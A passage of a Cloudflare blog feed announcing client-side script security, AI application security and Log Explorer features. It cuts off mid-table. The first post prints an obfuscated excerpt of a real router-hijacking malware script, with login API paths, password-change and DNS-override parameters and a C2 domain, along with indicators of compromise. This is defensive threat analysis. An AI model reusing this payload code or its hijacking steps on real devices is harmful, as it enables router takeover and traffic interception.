            <content:encoded><![CDATA[ <p>Client-side skimming attacks have a boring superpower: they can steal data without breaking anything. The page still loads. Checkout still completes. All it needs is just one malicious script tag.</p><p>If that sounds abstract, here are two recent examples of such skimming attacks:</p><ul><li><p>In January 2026, <a href="https://sansec.io/research/keylogger-major-us-bank-employees"><u>Sansec reported</u></a> a browser-side keylogger running on an employee merchandise store for a major U.S. bank, harvesting personal data, login credentials, and credit card information.</p></li><li><p>In September 2025, attackers published malicious releases of <a href="https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/"><u>widely used npm packages</u></a>. If those packages were bundled into front-end code, end users could be exposed to crypto-stealing in the browser.</p></li></ul><p>To further our goal of building a better Internet, Cloudflare established a core tenet during our <a href="https://www.cloudflare.com/innovation-week/birthday-week-2025/"><u>Birthday Week 2025</u></a>: powerful security features should be accessible <a href="https://blog.cloudflare.com/enterprise-grade-features-for-all/"><u>without requiring a sales engagement</u></a>. In pursuit of this objective, we are announcing two key changes today:</p><p>First, Cloudflare <b>Client-Side Security Advanced</b> (formerly <b>Page Shield add-on</b>) is now <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>available to self-serve</u></a> customers. And second, domain-based threat intelligence is now complimentary for all customers on the <a href="https://developers.cloudflare.com/page-shield/#availability"><u>free </u><b><u>Client-Side Security</u></b><u> bundle</u></a>.</p><p>In this post, we’ll explain how this product works and highlight a new AI detection system designed to identify malicious JavaScript while minimizing false alarms. We’ll also discuss several real-world applications for these tools.</p>
    <div>
      <h2>How Cloudflare Client-Side Security works</h2>
      <a href="#how-cloudflare-client-side-security-works">
        
      </a>
    </div>
    <p>Cloudflare Client-Side Security assesses 3.5 billion scripts per day, protecting 2,200 scripts per enterprise zone on average.</p><p>Under the hood, Client-Side Security collects these signals using browser reporting (for example, <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP"><u>Content Security Policy</u></a>), which means you don’t need scanners or app instrumentation to get started, and there is zero latency impact to your web applications. The only prerequisite is that your traffic is proxied through Cloudflare.</p><p>Client-Side Security <b>Advanced</b> provides immediate access to powerful security features:</p><ul><li><p><b>Smarter malicious script detection:</b> Using in-house machine learning, this capability is now enhanced with assessments from a Large Language Model (LLM). Read more details below.</p></li><li><p><b>Code change monitoring:</b> Continuous code change detection and monitoring is included, which is essential for meeting compliance like<a href="https://developers.cloudflare.com/page-shield/reference/pci-dss/"> <u>PCI DSS v4</u></a>, requirement 11.6.1.</p></li><li><p><b>Proactive blocking rules:</b> Benefit from positive content security rules that are maintained and enforced through continuous monitoring.</p></li></ul>
    <div>
      <h2>Detecting malicious intent JavaScripts</h2>
      <a href="#detecting-malicious-intent-javascripts">
        
      </a>
    </div>
    <p>Managing client-side security is a massive data problem. For an average enterprise zone, our systems observe approximately 2,200 unique scripts; smaller business zones frequently handle around 1,000. This volume alone is difficult to manage, but the real challenge is the volatility of the code.</p><p>Roughly a third of these scripts undergo code updates within any 30-day window. If a security team attempted to manually approve every new DOM (document object model) interaction or outbound connection, the resulting overhead would paralyze the development pipeline.</p><p>Instead, our detection strategy focuses on <i>what a script is trying to do</i>. That includes intent classification work <a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/"><u>we’ve written about previously</u></a>. In short, we analyze the script's behavior using an Abstract Syntax Tree (AST). By breaking the code down into its logical structure, we can identify patterns that signal malicious intent, regardless of how the code is obfuscated.</p>
    <div>
      <h2>The high cost of false positives</h2>
      <a href="#the-high-cost-of-false-positives">
        
      </a>
    </div>
    <p>Client-side security operates differently than active vulnerability scanners deployed across the web, where a Web Application Firewall (WAF) would constantly observe matched attack signatures. While a WAF constantly blocks high-volume automated attacks, a client-side compromise (such as a breach of an origin server or a third-party vendor) is a rare, high-impact event. In an enterprise environment with rigorous vendor reviews and code scanning, these attacks are rare.</p><p>This rarity creates a problem. Because real attacks are infrequent, a security system’s detections are statistically more likely to be false positives. For a security team, these false alarms create fatigue and hide real threats. To solve this, we integrated a Large Language Model (LLM) into our detection pipeline, drastically reducing the false positive rate.</p>
    <div>
      <h2>Adding an LLM-based second opinion for triage</h2>
      <a href="#adding-an-llm-based-second-opinion-for-triage">
        
      </a>
    </div>
    <p>Our <a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/"><u>frontline detection engine</u></a> is a Graph Neural Network (GNN). GNNs are particularly well-suited for this task: they operate on the Abstract Syntax Tree (AST) of the JavaScript code, learning structural representations that capture execution patterns regardless of variable renaming, minification, or obfuscation. In machine learning terms, the GNN learns an embedding of the code’s graph structure that generalizes across syntactic variations of the same semantic behavior.</p><p>The GNN is tuned for high recall. We want to catch novel, zero-day threats. Its precision is already remarkably high: less than 0.3% of total analyzed traffic is flagged as a false positive (FP). However, at Cloudflare’s scale of <a href="https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/"><u>3.5 billion scripts assessed daily</u></a>, even a sub-0.3% FP rate translates to a volume of false alarms that can be disruptive to customers.</p><p>The core issue is a classic class imbalance problem. While we can collect extensive malicious samples, the sheer diversity of benign JavaScript across the web is practically infinite. Heavily obfuscated but perfectly legitimate scripts — like bot challenges, tracking pixels, ad-tech bundles, and minified framework builds — can exhibit structural patterns that overlap with malicious code in the GNN’s learned feature space. As much as we try to cover a huge variety of interesting benign cases, the model simply has not seen enough of this infinite variety during training.</p><p>This is precisely where Large Language Models (LLMs) complement the GNN. LLMs possess a deep semantic understanding of real-world JavaScript practices: they recognize domain-specific idioms, common framework patterns, and can distinguish sketchy-but-innocuous obfuscation from genuinely malicious intent.</p><p>Rather than replacing the GNN, we designed a cascading classifier architecture:</p><ol><li><p><b>Every script is first evaluated by the GNN</b>. If the GNN predicts the script as benign, the detection pipeline terminates immediately. <b>This incurs only the minimal latency of the GNN for the vast majority of traffic, completely bypassing the heavier computation time of the LLM</b>.</p></li><li><p>If the GNN flags the script as potentially malicious (above the decision threshold), the script is <b>forwarded to an open-source LLM</b> hosted on Cloudflare <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> for a second opinion.</p></li><li><p>The LLM, provided with a security-specialized prompt context, <b>semantically evaluates the script’s intent</b>. If it determines the script is benign, it overrides the GNN’s verdict.</p></li></ol><p>This two-stage design gives us the best of both worlds: the GNN’s high recall for structural malicious patterns, combined with the LLM’s broad semantic understanding to filter out false positives.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/438frLuYPU51j0uhtM5foj/10c53b3b3ccc84b00c754c872ad20492/image3.png" />
          </figure><p><a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/#training-the-model-to-detect-hidden-malicious-intent"><u>As we previously explained</u></a>, our GNN is trained on publicly accessible script URLs, the same scripts any browser would fetch. The LLM inference at runtime runs entirely within Cloudflare’s network via <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> using open-source models (we currently use <code>gpt-oss-120b</code>).</p><p>As an additional safety net, every script flagged by the GNN is logged to Cloudflare <a href="https://developers.cloudflare.com/r2/"><u>R2</u></a> for posterior analysis. This allows us to continuously audit whether the LLM’s overrides are correct and catch any edge cases where a true attack might have been inadvertently filtered out. Yes, we dogfood our own storage products for our own ML pipeline.</p><p>The results from our internal evaluations on real production traffic are compelling. Focusing on total analyzed traffic under the JS Integrity threat category, the secondary LLM validation layer reduced false positives by nearly 3x: dropping the already low ~0.3% FP rate down to ~0.1%. When evaluating unique scripts, the impact is even more dramatic: the FP rate plummets a whopping ~200x, from ~1.39% down to just 0.007%.</p><p>At our scale, cutting the overall false positive rate by two-thirds translates to millions fewer false alarms for our customers every single day. Crucially, our True Positive (actual attack) detection capability includes a fallback mechanism:as noted above, we audit the LLM’s overrides to check for possible true attacks that were filtered by the LLM.</p><p>Because the LLM acts as a highly reliable precision filter in this pipeline, we can now afford to lower the GNN’s decision threshold, making it even more aggressive. This means we catch novel, highly obfuscated True Attacks that would have previously fallen just below the detection boundary, all without overwhelming customers with false alarms. In the next phase, we plan to push this even further.</p>
    <div>
      <h3>Catching zero-days in the wild: The <code>core.js</code> router exploit</h3>
      <a href="#catching-zero-days-in-the-wild-the-core-js-router-exploit">
        
      </a>
    </div>
    <p>This two-stage architecture is already proving its worth in the wild. Just recently, our detection pipeline flagged a novel, highly obfuscated malicious script (<code>core.js</code>) targeting users in specific regions.</p><p>In this case, the payload was engineered to commandeer home routers (specifically Xiaomi OpenWrt-based devices). Upon closer inspection via deobfuscation, the script demonstrated significant situational awareness: it queries the router's WAN configuration (dynamically adapting its payload using parameters like <code>wanType=dhcp</code>, <code>wanType=static</code>, and <code>wanType=pppoe</code>), overwrites the DNS settings to hijack traffic through Chinese public DNS servers, and even attempts to lock out the legitimate owner by silently changing the admin password. Instead of compromising a website directly, it had been injected into users' sessions via compromised browser extensions.</p><p>To evade detection, the script's core logic was heavily minified and packed using an array string obfuscator — a classic trick, but effective enough that traditional threat intelligence platforms like VirusTotal have not yet reported detections at the time of this writing.</p><p><b>Our GNN successfully revealed</b> the underlying malicious structure despite the obfuscation, and the <b>Workers AI LLM confidently confirmed</b> the intent. Here is a glimpse of the payload showing the target router API and the attempt to inject a rogue DNS server:</p>
            <pre><code>const _0x1581=['bXhqw','=sSMS9WQ3RXc','cookie','qvRuU','pDhcS','WcQJy','lnqIe','oagRd','PtPlD','catch','defaultUrl','rgXPslXN','9g3KxI1b','123123123','zJvhA','content','dMoLJ','getTime','charAt','floor','wZXps','value','QBPVX','eJOgP','WElmE','OmOVF','httpOnly','split','userAgent','/?code=10&amp;asyn=0&amp;auth=','nonce=','dsgAq','VwEvU','==wb1kHb9g3KxI1b','cNdLa','W748oghc9TefbwK','_keyStr','parse','BMvDU','JYBSl','SoGNb','vJVMrgXPslXN','=Y2KwETdSl2b','816857iPOqmf','uexax','uYTur','LgIeF','OwlgF','VkYlw','nVRZT','110594AvIQbs','LDJfR','daPLo','pGkLa','nbWlm','responseText','20251212','EKjNN','65kNANAl','.js','94963VsBvZg','WuMYz','domain','tvSin','length','UBDtu','pfChN','1TYbnhd','charCodeAt','/cgi-bin/luci/api/xqsystem/login','http://192.168.','trace','https://api.qpft5.com','&amp;newPwd=','mWHpj','wanType','XeEyM','YFBnm','RbRon','xI1bxI1b','fBjZQ','shift','=8yL1kHb9g3KxI1b','http://','LhGKV','AYVJu','zXrRK','status','OQjnd','response','AOBSe','eTgcy','cEKWR','&amp;dns2=','fzdsr','filter','FQXXx','Kasen','faDeG','vYnzx','Fyuiu','379787JKBNWn','xiroy','mType','arGpo','UFKvk','tvTxu','ybLQp','EZaSC','UXETL','IRtxh','HTnda','trim','/fee','=82bv92bv92b','BGPKb','BzpiL','MYDEF','lastIndexOf','wypgk','KQMDB','INQtL','YiwmN','SYrdY','qlREc','MetQp','Wfvfh','init','/ds','HgEOZ','mfsQG','address','cDxLQ','owmLP','IuNCv','=syKxEjUS92b','then','createOffer','aCags','tJHgQ','JIoFh','setItem','ABCDEFGHJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789','Kwshb','ETDWH','0KcgeX92i0efbwK','stringify','295986XNqmjG','zfJMl','platform','NKhtt','onreadystatechange','88888888','push','cJVJO','XPOwd','gvhyl','ceZnn','fromCharCode',';Secure','452114LDbVEo','vXkmg','open','indexOf','UiXXo','yyUvu','ddp','jHYBZ','iNWCL','info','reverse','i4Q18Pro9TefbwK','mAPen','3960IiTopc','spOcD','dbKAM','ZzULq','bind','GBSxL','=A3QGRFZxZ2d','toUpperCase','AvQeJ','diWqV','iXtgM','lbQFd','iOS','zVowQ','jTeAP','wanType=dhcp&amp;autoset=1&amp;dns1=','fNKHB','nGkgt','aiEOB','dpwWd','yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW','encode','gWYAY','mckDW','createDataChannel'];
const _0x4b08=function(_0x5cc416,_0x2b0c4c){_0x5cc416=_0x5cc416-0x1d5;let _0xd00112=_0x1581[_0x5cc416];return _0xd00112;};
(function(_0x3ff841,_0x4d6f8b){const _0x45acd8=_0x4b08;while(!![]){try{const _0x1933aa=-parseInt(_0x45acd8(0x275))*-parseInt(_0x45acd8(0x264))+-parseInt(_0x45acd8(0x1ff))+parseInt(_0x45acd8(0x25d))+-parseInt(_0x45acd8(0x297))+parseInt(_0x45acd8(0x20c))+parseInt(_0x45acd8(0x26e))+-parseInt(_0x45acd8(0x219))*parseInt(_0x45acd8(0x26c));if(_0x1933aa===_0x4d6f8b)break;else _0x3ff841['push'](_0x3ff841['shift']());}catch(_0x8e5119){_0x3ff841['push'](_0x3ff841['shift']());}}}(_0x1581,0x842ab));</code></pre>
            <p>This is exactly the kind of sophisticated, zero-day threat that a static signature-based WAF would miss but our structural and semantic AI approach catches.</p>
    <div>
      <h4>Indicators of Compromise (IOCs)</h4>
      <a href="#indicators-of-compromise-iocs">
        
      </a>
    </div>
    <ul><li><p><b>URL:</b> hxxps://ns[.]qpft5[.]com/ads/core[.]js</p></li><li><p><b>SHA-256:</b> 4f2b7d46148b786fae75ab511dc27b6a530f63669d4fe9908e5f22801dea9202</p></li><li><p><b>C2 Domain:</b> hxxps://api[.]qpft5[.]com</p></li></ul>
    <div>
      <h2>Domain-based threat intelligence free for all</h2>
      <a href="#domain-based-threat-intelligence-free-for-all">
        
      </a>
    </div>
    <p>Today we are making domain-based threat intelligence available to all Cloudflare Client-Side Security customers, regardless of whether you use the Advanced offering.</p><p>In 2025, we saw many non-enterprise customers affected by client-side attacks, particularly those customers running webshops on the Magento platform. These attacks persisted for days or even weeks after they were publicized. Small and medium-sized companies often lack the enterprise-level resources and expertise needed to maintain a high security standard.</p><p>By providing domain-based threat intelligence to everyone, we give site owners a critical, direct signal of attacks affecting their users. This information allows them to take immediate action to clean up their site and investigate potential origin compromises.</p><p>To begin, simply enable Client-Side Security with a toggle <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>in the dashboard</u></a>. We will then highlight any JavaScript or connections associated with a known malicious domain.</p>
    <div>
      <h2>Get started with Client-Side Security Advanced for PCI DSS v4</h2>
      <a href="#get-started-with-client-side-security-advanced-for-pci-dss-v4">
        
      </a>
    </div>
    <p>To learn more about Client-Side Security Advanced pricing, please visit <a href="https://www.cloudflare.com/plans/"><u>the plans page</u></a>. Before committing, we will estimate the cost based on your last month’s HTTP requests, so you know exactly what to expect.</p><p>Client-Side Security Advanced has all the tools you need to meet the requirements <a href="https://developers.cloudflare.com/page-shield/reference/pci-dss/"><u>of PCI DSS v4</u></a> as an e-commerce merchant, particularly 6.4.3 and 11.6.1. Sign up today <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>in the dashboard</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">6NYXSzUcRxDdj9UP0kouAK</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Juan Miguel Cejuela</dc:creator>
        </item>
        <item>
            <title><![CDATA[AI Security for Apps is now generally available]]></title>
            <link>https://blog.cloudflare.com/ai-security-for-apps-ga/</link>
            <pubDate>Wed, 11 Mar 2026 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare AI Security for Apps is now generally available, providing a security layer to discover and protect AI-powered applications, regardless of the model or hosting provider. We are also making AI discovery free for all plans, to help teams find and secure shadow AI deployments. ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare’s <a href="https://www.cloudflare.com/demos/protect-ai-apps/"><u>AI Security for Apps</u></a> detects and mitigates threats to AI-powered applications. Today, we're announcing that it is generally available.</p><p>We’re shipping with new capabilities like detection for custom topics, and we're making AI endpoint discovery free for every Cloudflare customer—including those on Free, Pro, and Business plans—to give everyone visibility into where AI is deployed across their Internet-facing apps.</p><p>We're also announcing an expanded collaboration with IBM, which has chosen Cloudflare to deliver AI security to its cloud customers. And we’re partnering with Wiz to give mutual customers a unified view of their AI security posture.</p>
    <div>
      <h2>A new kind of attack surface</h2>
      <a href="#a-new-kind-of-attack-surface">
        
      </a>
    </div>
    <p>Traditional web applications have defined operations: check a bank balance, make a transfer. You can write deterministic rules to secure those interactions. </p><p>AI-powered applications and agents are different. They accept natural language and generate unpredictable responses. There's no fixed set of operations to allow or deny, because the inputs and outputs are probabilistic. Attackers can manipulate large language models to take unauthorized actions or leak sensitive data. Prompt injection, sensitive information disclosure, and unbounded consumption are just a few of the risks cataloged in the <a href="https://genai.owasp.org/llm-top-10/"><u>OWASP Top 10 for LLM Applications</u></a>.</p><p>These risks escalate as AI applications become agents. When an AI gains access to tool calls—processing refunds, modifying accounts, providing discounts, or accessing customer data—a single malicious prompt becomes an immediate security incident.</p><p>Customers tell us what they’re up against. "Most of Newfold Digital's teams are putting in their own Generative AI safeguards, but everybody is innovating so quickly that there are inevitably going to be some gaps eventually,” says Rick Radinger, Principal Systems Architect at Newfold Digital, which operates Bluehost, HostGator, and Domain.com. </p>
    <div>
      <h2>What AI Security for Apps does</h2>
      <a href="#what-ai-security-for-apps-does">
        
      </a>
    </div>
    <p>We built AI Security for Apps to address this. It sits in front of your AI-powered applications, whether you're using a third-party model or hosting your own, as part of Cloudflare's <a href="https://www.cloudflare.com/learning/cdn/glossary/reverse-proxy/"><u>reverse proxy</u></a>. It helps you (1) discover AI-powered apps across your web property, (2) detect malicious or off-policy behavior to those endpoints, and (3) mitigate threats via the familiar WAF rule builder. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xpmckBUupzELjYOSx5bAF/cace1ab2ed2dd54d8d7a7ff60587ef65/BLOG-3128_2.png" />
          </figure>
    <div>
      <h3>Discovery — now free for everyone</h3>
      <a href="#discovery-now-free-for-everyone">
        
      </a>
    </div>
    <p>Before you can protect your LLM-powered applications, you need to know where they're being used. We often hear from security teams who don’t have a complete picture of AI deployments across their apps, especially as the LLM market evolves and developers swap out models and providers. </p><p>AI Security for Apps automatically identifies LLM-powered endpoints across your web properties, regardless of where they’re hosted or what the model is. Starting today, this capability is free for every Cloudflare customer, including Free, Pro, and Business plans. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2dBKhU5VNbzAePDAnaHkTK/3f6a569e495e03c3e2afca4d6183e02d/image4.png" />
          </figure><p><sup><i>Cloudflare’s dashboard page of web assets, showing 2 example endpoints labelled as </i></sup><code><sup><i>cf-llm</i></sup></code></p><p>Discovering these endpoints automatically requires more than matching common path patterns like <code>/chat/completions</code>. Many AI-powered applications don't have a chat interface: think product search, property valuation tools, or recommendation engines. We built a <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#discovering-llm-powered-applications"><u>detection system that looks at how endpoints behave</u></a>, not what they're called. To confidently identify AI-powered endpoints, <a href="https://developers.cloudflare.com/api-shield/security/api-discovery/#requirements"><u>sufficient valid traffic</u></a> is required.</p><p>AI-powered endpoints that have been discovered will be visible under <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/web-assets"><u>Security → Web Assets</u></a>, labeled as <code>cf-llm</code>. For customers on a Free plan, endpoint discovery is initiated when you first navigate to the <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/web-assets/discovery"><u>Discovery page</u></a>. For customers on a paid plan, discovery occurs automatically in the background on a recurring basis. If your AI-powered endpoints have been discovered, you can review them immediately.</p>
    <div>
      <h3>Detection</h3>
      <a href="#detection">
        
      </a>
    </div>
    <p>AI Security for Apps detections follow the <a href="https://developers.cloudflare.com/waf/detections/"><u>always-on approach</u></a> for traffic to your AI-powered endpoints. Each prompt is run through multiple detection modules for prompt injection, PII exposure, and sensitive or toxic topics. The results—whether the prompt was malicious or not—are attached as metadata you can use in custom WAF rules to enforce your policies. We are continuously exploring ways to leverage our global network, which sees traffic from roughly <a href="https://w3techs.com/technologies/history_overview/proxy/all"><u>20% of the web</u></a>, to identify new attack patterns across millions of sites before they reach yours.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7oGjcaUL5L9zlAkz8lSmXv/4354a9555135e19de5c93d3d113e6790/BLOG-3128_4.png" />
          </figure>
    <div>
      <h4>New in GA: Custom topics detection</h4>
      <a href="#new-in-ga-custom-topics-detection">
        
      </a>
    </div>
    <p>The product ships with built-in detection for common threats: prompt injections, <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#detecting-prompts-designed-to-leak-pii"><u>PII extraction</u></a>, and <a href="https://blog.cloudflare.com/block-unsafe-llm-prompts-with-firewall-for-ai/"><u>toxic topics</u></a>. But every business has its own definition of what's off-limits. A financial services company might need to detect discussions of specific securities. A healthcare company might need to flag conversations that touch on patient data. A retailer might want to know when customers are asking about competitor products.</p><p>The new custom topics feature lets you define these categories. You specify the topic, we inspect the prompt and output a relevance score that you can use to log, block, or handle however you decide. Our goal is to build an extensible tool that flexes to your use cases.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1WzPhy11ZmUXDGZjft4sY1/7ebfafaf2114eaba83a829694837fc2c/image1.png" />
          </figure><p><sup><i>Prompt relevance score inside of AI Security for Apps</i></sup></p>
    <div>
      <h4>New in GA: Custom prompt extraction</h4>
      <a href="#new-in-ga-custom-prompt-extraction">
        
      </a>
    </div>
    <p>AI Security for Apps enforces guardrails before unsafe prompts can reach your infrastructure. To run detections accurately and provide real-time protection, we first need to identify the prompt within the request payload. Prompts can live anywhere in a request body, and different LLM providers structure their APIs differently. OpenAI and most providers use <code>$.messages[*].content</code> for chat completions. Anthropic's batch API nests prompts inside <code>$.requests[*].params.messages[*].content</code>. Your custom property valuation tool might use <code>$.property_description</code>.</p><p>Out of the box, we support the standard formats used by OpenAI, Anthropic, Google Gemini, Mistral, Cohere, xAI, DeepSeek, and others. When we can't match a known pattern, we apply a default-secure posture and run detection on the entire request body. This can introduce false positives when the payload contains fields that are sensitive but don't feed directly to an AI model, for example, a <code>$.customer_name</code> field alongside the actual prompt might trigger PII detection unnecessarily.</p><p>Soon, you'll be able to define your own JSONPath expressions to tell us exactly where to find the prompt. This will reduce false positives and lead to more accurate detections. We're also building a prompt-learning capability that will automatically adapt to your application's structure over time.</p>
    <div>
      <h3>Mitigation</h3>
      <a href="#mitigation">
        
      </a>
    </div>
    <p>Once a threat is identified and scored, you can block it, log it, or deliver custom responses, using the same WAF rules engine you already use for the rest of your application security. The power of Cloudflare’s shared platform is that you can combine AI-specific signals with everything else we know about a request, represented by <a href="https://developers.cloudflare.com/ruleset-engine/rules-language/fields/reference/"><u>hundreds of fields</u></a> available in the WAF. A prompt injection attempt is suspicious. A prompt injection attempt from an IP that’s been probing your login page, using a browser fingerprint associated with previous attacks, and rotating through a botnet is a different story. Point solutions that only see the AI layer can’t make these connections.</p><p>This unified security layer is exactly what they need at Newfold Digital to discover, label, and protect AI endpoints, says Radinger: “We look forward to using it across all these projects to serve as a fail-safe."</p>
    <div>
      <h2>Growing ecosystem</h2>
      <a href="#growing-ecosystem">
        
      </a>
    </div>
    <p>AI Security for Applications will also be available through Cloudflare's growing ecosystem, including through integration with IBM Cloud. Through <a href="https://www.ibm.com/products/cloud-internet-services"><u>IBM Cloud Internet Services (CIS)</u></a>, end users can already procure advanced application security solutions and manage them directly through their IBM Cloud account. </p><p>We're also partnering with Wiz to connect AI Security for Applications with <a href="https://www.wiz.io/solutions/ai-spm"><u>Wiz AI Security</u></a>, giving mutual customers a unified view of their AI security posture, from model and agent discovery in the cloud to application-layer guardrails at the edge.</p>
    <div>
      <h2>How to get started</h2>
      <a href="#how-to-get-started">
        
      </a>
    </div>
    <p>AI Security for Apps is available now for Cloudflare’s Enterprise customers. Contact your account team to get started, or see the product in action with a <a href="https://www.cloudflare.com/demos/protect-ai-apps/"><u>self-guided tour</u></a>.</p><p>If you're on a Free, Pro, or Business plan, you can use AI endpoint discovery today. Log in to your dashboard and navigate to <b>Security → Web Assets</b> to see which endpoints we've identified. Keep an eye out — we plan to make all AI Security for Apps capabilities available for customers on all plans soon.</p><p>For configuration details, see our <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/"><u>documentation</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Application Security]]></category>
            <category><![CDATA[Application Services]]></category>
            <guid isPermaLink="false">4MBDCV6FV61Xbyav3cW8Xy</guid>
            <dc:creator>Liam Reese</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Catherine Newcomb</dc:creator>
        </item>
        <item>
            <title><![CDATA[Investigating multi-vector attacks in Log Explorer]]></title>
            <link>https://blog.cloudflare.com/investigating-multi-vector-attacks-in-log-explorer/</link>
            <pubDate>Tue, 10 Mar 2026 13:00:00 GMT</pubDate>
            <description><![CDATA[ Log Explorer customers can now identify and investigate multi-vector attacks. Log Explorer supports 14 additional Cloudflare datasets, enabling users to have a 360-degree view of their network. ]]></description>
            <content:encoded><![CDATA[ <p>In the world of cybersecurity, a single data point is rarely the whole story. Modern attackers don’t just knock on the front door; they probe your APIs, flood your network with "noise" to distract your team, and attempt to slide through applications and servers using stolen credentials.</p><p>To stop these multi-vector attacks, you need the full picture. By using Cloudflare Log Explorer to conduct security forensics, you get 360-degree visibility through the integration of 14 new datasets, covering the full surface of Cloudflare’s Application Services and Cloudflare One product portfolios. By correlating telemetry from application-layer HTTP requests, network-layer DDoS and Firewall logs, and Zero Trust Access events, security analysts can significantly reduce Mean Time to Detect (MTTD) and effectively unmask sophisticated, multi-layered attacks.</p><p>Read on to learn more about how Log Explorer gives security teams the ultimate landscape for rapid, deep-dive forensics.</p>
    <div>
      <h2>The flight recorder for your entire stack</h2>
      <a href="#the-flight-recorder-for-your-entire-stack">
        
      </a>
    </div>
    <p>The contemporary digital landscape requires deep, correlated telemetry to defend against adversaries using multiple attack vectors. Raw logs serve as the "flight recorder" for an application, capturing every single interaction, attack attempt, and performance bottleneck. And because Cloudflare sits at the edge, between your users and your servers, all of these events are logged before the requests even reach your infrastructure. </p><p>Cloudflare Log Explorer centralizes these logs into a unified interface for rapid investigation.</p>
    <div>
      <h3>Log Types Supported</h3>
      <a href="#log-types-supported">
        
      </a>
    </div>
    
    <div>
      <h4>Zone-Scoped Logs</h4>
      <a href="#zone-scoped-logs">
        
      </a>
    </div>
    <p><i>Focus: Website traffic, security events, and edge performance.</i></p><table><tr><td><p><b>HTTP Requests</b></p></td><td><p>As the most comprehensive dataset, it serves as the "primary record" of all application-layer traffic, enabling the reconstruction of session activity, exploit attempts, and bot patterns.</p></td></tr><tr><td><p><b>Firewall Events</b></p></td><td><p>Provides critical evidence of blocked or challenged threats, allowing analysts to identify the specific WAF rules, IP reputations, or custom filters that intercepted an attack.</p></td></tr><tr><td><p><b>DNS Logs</b></p></td><td><p>Identify cache poisoning attempts, domain hijacking, and infrastructure-level reconnaissance by tracking every query resolved at the authoritative edge.</p></td></tr><tr><td><p><b>NEL (Network Error Logging) Reports</b></p></td><td><p>Distinguish between a coordinated Layer 7 DDoS attack and legitimate network connectivity issues by tracking client-side browser errors.</p></td></tr><tr><td><p><b>Spectrum Events</b></p></td><td><p>For non-web applications, these logs provide visibility into L4 traffic (TCP/UDP), helping to identify anomalies or brute-force attacks against protocols like SSH, RDP, or custom gaming traffic.</p></td></tr><tr><td><p><b>Page Shield</b></p></td><td><p>Track and audit unauthorized changes to your site's client-side environment such as JavaScript, outbound connections.</p></td></tr><tr><td><p><b>Zaraz Events</b></p></td><td><p>Examine how third-party tools and trackers are interacting with user data, which is vital for auditing privacy compliance and detecting unauthorized script behaviors.</p></td></tr></table>
    <div>
      <h4>Account-Scoped Logs</h4>
      <a href="#account-scoped-logs">
        
      </a>
    </div>
    <p><i>Focus: Internal security, Zero Trust, administrative changes, and network activity.</i></p><table><tr><td><p><b>Access Requests</b></p></td><td><p>Tracks identity-based authentication events to determine which users accessed specific internal applications and whether those attempts were authorized.</p></td></tr><tr><td><p><b>Audit Logs</b></p></td><td><p>Provides a trail of configuration changes within the Cloudflare dashboard to identify unauthorized administrative actions or modifications.</p></td></tr><tr><td><p><b>CASB Findings</b></p></td><td><p>Identifies security misconfigurations and data risks within SaaS applications (like Google Drive or Microsoft 365) to prevent unauthorized data exposure.</p></td></tr><tr><td><p><b>Magic Transit / IPSec Logs</b></p></td><td><p>Helps network engineers perform network-level (L3) monitoring such as reviewing tunnel health and view BGP routing changes.</p></td></tr><tr><td><p><b>Browser Isolation Logs</b></p></td><td><p>Tracks user actions <i>inside</i> an isolated browser session (e.g., copy-paste, print, or file uploads) to prevent data leaks on untrusted sites </p></td></tr><tr><td><p><b>Device Posture Results </b></p></td><td><p>Details the security health and compliance status of devices connecting to your network, helping to identify compromised or non-compliant endpoints.</p></td></tr><tr><td><p><b>DEX Application Tests </b></p></td><td><p>Monitors application performance from the user's perspective, which can help distinguish between a security-related outage and a standard performance degradation.</p></td></tr><tr><td><p><b>DEX Device State 